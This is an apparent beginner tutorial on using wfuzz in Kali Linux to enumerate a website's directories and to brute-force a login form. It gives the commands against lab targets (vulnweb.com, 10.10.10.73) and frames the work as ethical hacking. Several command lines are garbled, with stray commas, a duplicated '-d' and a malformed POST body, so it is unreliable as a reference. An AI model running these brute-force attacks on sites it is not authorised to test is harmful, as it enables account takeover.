It is very important tool of kali Linux that is used to perform brute force attack on a website. By this we can find the username and password of a website. Also we can find important (files) and folders of a website this tool. It is very best tool of website hacking so we must learn it as ethical hacker a cyber security researcher. It is mostly pre-installed in kali Linux or you can install it using command;
(apt-get install wfuzz -y)
But to install in use it python3 must be install in your kali Linux.
The main commands of wfuzz are following;
TO SEE ALL OPTION OF WFUZZ:
(wfuzz -h) or (wfuzz -help)
Finding directories of website using wfuzz
TO SEE THE FILES, FOLDERS, IMAGE ETC OF WEBSITE:
(wfuzz -z file, +path of file -u +url or link of website/fuzz) e.g.
(wfuzz -z file, /usr/share/wordlist/rockyou.txt -u http://vulnweb.com/fuzz)
TO HIDE AN ERROR CODE RESPONSE DURING ATTACK:
(wfuzz -c -z file, +path of file -u +url or link of website --hc + error code) e.g.
(wfuzz -c -z file, /usr/share/wordlist/rockyou.txt -u http://vulnweb.com/FUZZ --hc 404)
TO SET CONNECTION NUMBER AND CONNECTION TIME BETWEEN TWO ATTACK:
(wfuzz -c -z file, +path of file -u +url or link of website --hc + error code -t + no of connections -s + connection time -u + link of website/FUZZ) e.g.
(wfuzz -c -z file, /usr/share/wordlist/rockyou.txt --hc 404 -t 20 -s 2 -u http://vulnweb.com/FUZZ)
As you will run these commands to check different files and folders the wfuzz show you different files and folders like (images), (pictures) etc. and you can check completely by using them with with url or link in your browser. For example.
(http://vulnweb.com/pictures)etc
BRUTEFORE ATTACK ON THE WEBSIE USING WFUZZ:
Wfuzz is a powerful tool by which we can find the (username) and (password) of website to login. For brute force attack it works same as hydra.
To perform of brute force attack first of all find the (admin login) page of website. Then open the (burp suite) and capture the request when you enter the wrong (username) and password) and copy it as shown in figure.
Wrong credentials found in burp suite
Also find the (invalid message) when you enter the wrong username and password. Now let consider that our (login page) of website is (http://10.10.10.73/login.php) and we want to
perform brute force attack on it. So, run the following command in terminal.
(wfuzz -c -z +file, path of list “password --hs + invalid massage” -d +: “capture request in which wrong user and password is replaced with (FUZZ) + login link of website) e.g. (wfuzz -c -z file, /usr/share/wordlist/rockyou.txt --hs “invalid username and password” -d “username=FUZZ&password” -d “username=FUZZ&password=FUZZ” http://10.10.10.73/login.php)
Brute force on login page of website